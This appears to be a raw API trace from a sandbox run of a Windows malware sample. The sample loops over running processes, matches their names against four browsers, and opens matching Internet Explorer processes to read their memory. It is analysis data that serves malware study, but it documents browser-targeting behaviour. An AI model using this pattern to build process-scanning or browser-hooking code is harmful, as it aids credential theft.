	[0232.511] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.512] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0232.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.512] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0232.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6dec
	[0232.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.513] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0232.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.514] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.515] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0232.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.515] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0232.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6df0
	[0232.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.517] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0232.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.517] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.518] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0232.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.519] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6df4
	[0232.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.520] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.520] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.520] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.521] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.521] NtQueryInformationProcess (in: ProcessHandle=0x6df4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.521] ReadProcessMemory (in: hProcess=0x6df4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.521] ReadProcessMemory (in: hProcess=0x6df4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0232.521] ReadProcessMemory (in: hProcess=0x6df4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.522] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6df8
	[0232.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.523] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.523] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.523] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.524] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.524] NtQueryInformationProcess (in: ProcessHandle=0x6df8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.524] ReadProcessMemory (in: hProcess=0x6df8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.524] ReadProcessMemory (in: hProcess=0x6df8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0232.524] ReadProcessMemory (in: hProcess=0x6df8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.524] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6dfc
	[0232.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.525] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0232.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6e00
	[0232.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.527] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0232.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.528] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.528] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0232.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.529] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6e04
	[0232.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.530] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.530] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.530] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.531] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6e08
	[0232.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.533] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.533] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.533] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.534] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6e0c
	[0232.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.535] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.536] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.536] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.536] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6e10
	[0232.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.537] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.538] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.538] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.538] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0232.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6e14
	[0232.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.540] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.540] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.540] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.541] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6e18
	[0232.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.542] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.542] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.543] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.543] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6e1c
	[0232.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.544] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.544] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.545] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.545] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.545] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0232.546] CloseHandle (hObject=0x4fd0) returned 1
	[0232.546] Sleep (dwMilliseconds=0x64) 
	[0232.644] GetCurrentProcessId () returned 0x110
	[0232.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0232.649] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.650] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6e20
	[0232.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.652] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.653] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.653] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.654] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6e24
	[0232.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.655] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.656] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.656] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.657] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6e28
	[0232.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.659] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0232.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.659] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.660] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0232.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.661] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6e2c
	[0232.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.662] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.662] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.662] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.663] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6e30
	[0232.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.664] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0232.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.664] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.665] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0232.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.665] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6e34
	[0232.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.666] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0232.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.666] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.667] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0232.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.667] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6e38
	[0232.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.668] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0232.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.669] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.669] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0232.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.669] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6e3c
	[0232.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.707] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.707] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.707] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.708] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
